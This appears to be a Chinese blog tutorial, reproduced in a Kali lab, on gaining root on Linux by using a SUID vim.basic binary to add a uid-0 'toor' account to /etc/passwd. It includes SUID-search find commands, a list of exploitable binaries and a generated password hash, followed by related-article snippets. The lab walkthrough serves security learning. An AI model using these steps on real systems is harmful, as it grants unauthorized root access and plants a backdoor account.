linux利用* vim提权,Linux使用suid vim.basic文件实现提权
在kali上复现
先给需要的vim.basic文件设置suid权限
chmod u+s /usr/bin/vim.basic
先adduser test1一个普通权限用户
现在就是一个合适的提权环境
通过以下命令可以找到存在suid权限的文件
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
可用于提权的文件有
nmap
vim
find
bash
more
less
nano
cp
利用vim提权的思路是修改etc/passwd文件,为自己添加一个有root权限的用户
passwd文件用户格式为:用户名:密码:uid:gid:注释:home目录:用户的shell
这边可以看看root用户的格式
root:x:0:0:root:/root:/bin/bash
(密码这部分之所以是x,是因为真正的密码存在/etc/shadow文件里)
生成密码:用openssl passwd -1 –salt asd 123 (这里是-1(数字1)不是L)
直接写在passwd文件里面,
toor:$1$asd$sTMDZlRI6L.jJEw2I.3x8.:0:0:root:/toor:/bin/bash
用vim /etc/passwd可以修改,但是在保存是会出现E212,无法保存,提示我们没有权限修改这个
这时应该用之前find找到的vim.basic文件运行,这个程序是有suid权限的。绝对可以修改
vim.basic /etc/passwd
用这个打开,然后修改文件,就可以成功保存
可以看到已经添加了,su toor切换,密码123,再id查看一下权限
root权限
chmod u+s /usr/bin/vim.basic
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持脚本之家。
linux利用* vim提权,Linux使用suid vim.basic文件实现提权相关推荐
- linux suid 脚本,Linux使用suid vim.basic文件实现提权
在kali上复现 先给需要的vim.basic文件设置suid权限 chmod u+s /usr/bin/vim.basic 先adduser test1一个普通权限用户 现在就是一个合适的提权环境 ...
- grub命令 u盘安装linux,利用U盘安装Linux操作系统(grub4dos,USB,Linux)
前一刻盘太多,手头没有DVD拉,今天又想装一下系统,于是想起以前用过的grub4dos来. 基本思想是把grub4dos装到U盘里,同时将iso文件(3G多)也弄到U盘中,这样直接从U盘启动安装系统. ...
- Linux利用子命令m,Linux mdir命令
Linux mdir命令用于显示MS-DOS目录. mdir为mtools工具指令,模拟MS-DOS的dir指令,可显示MS-DOS文件系统中的目录内容. 语法mdir [-afwx/][目录] 参数 ...
- linux利用* vim提权,linux 通过suid vim.basic文件提权
在kali上复现 先给需要的vim.basic文件设置suid权限 chmod u+s /usr/bin/vim.basic 先adduser test1一个普通权限用户 现在就是一个合适的提权环境 ...
- Linux怎么对当前目录提权,linux提权方法(不断总结更新)
1.suid提权 运行某些程序时暂时获得root的权限,例如ping(socket需要root才能运行) 搜索符合条件的可以用来提权的: find / -perm -u=s -type f 2> ...
- 提权—Linux 定时任务环境变量数据库
Linux提权环境变量安全-(aliyun,本地): 前提:需要配合SUID进行环境变量提权且是本地用户环境下(因此该方法比较难实现,鸡肋) 提权过程:手写调用文件-编译-复制文件-增加环境变量-执行 ...
- Linux Privilege Escalation Kernel Exploits | Linux本地内核提权漏洞复现 CVE-2015-1328
Linux Privilege Escalation Kernel Exploits | Linux本地内核提权漏洞复现 CVE-2015-1328 文章目录 Linux Privilege Esca ...
- linux数字雨代码解释,linux提权 漏洞合集 linux-kernel-exploits
CVE–2018–1000001 [glibc] (glibc <= 2.26) CVE-2017-1000367 [Sudo] (Sudo 1.8.6p7 – 1.8.20) CVE-2017 ...
- 【Linux】软件包管理器 yum 与编辑器 vim 的基本使用
文章目录 一.yum 背景知识 1.商业生态 2.开源生态 3.软件生态本土化 二.yum 的基本使用 1.查看软件包 2.安装软件 3.卸载软件 三.vim 的基本使用 1.vim 的基本概念 2. ...
最新文章
- Nginx + Lua + redis (一)(转)
- android ip探测,Android-IpReachabilityMonitor
- linux下安装mysql-5.6.41
- py2exe打包OpenCV,找不到libiomp5md.dll
- 【转】WebServices:WSDL的结构分析
- l380废墨收集垫已到使用寿命_湖北雨水收集系统定制
- shell学习脚本-tomcat停止脚本
- 基金理财系列6 之指数基金
- 解决github拉项目慢的问题
- zedboard连接pmod oledrgb
- java案例代码10--购物车案例--重要
- 家用计算机的ram怎么清理,电脑内存满了怎么清理【解决流程】
- 微软在上海有哪些办公地点?上下班来回三小时?不止闵大荒!
- 树莓派2B使用360随身WiFi2代连接WiFi
- TED地道用语学习 - <脆弱的力量> - 3
- UE5打包失败:AutomationTool exiting with ExitCode=-532462766 解决方法
- 深度linux引导安装教程,deepin深度系统安装教程-电脑系统安装手册
- 港股中的老千,千万别碰!
- SpringBoot整合Thymeleaf+EasyExcel实现excel文件的读取并展示,附加swagger2配置(超详细示范!)
- 跳舞吧机器人爷叶运鹏_【学海有舟,从“融”出发】我,一个残障学生,觉得自己来学校会拖累同学,咋办?...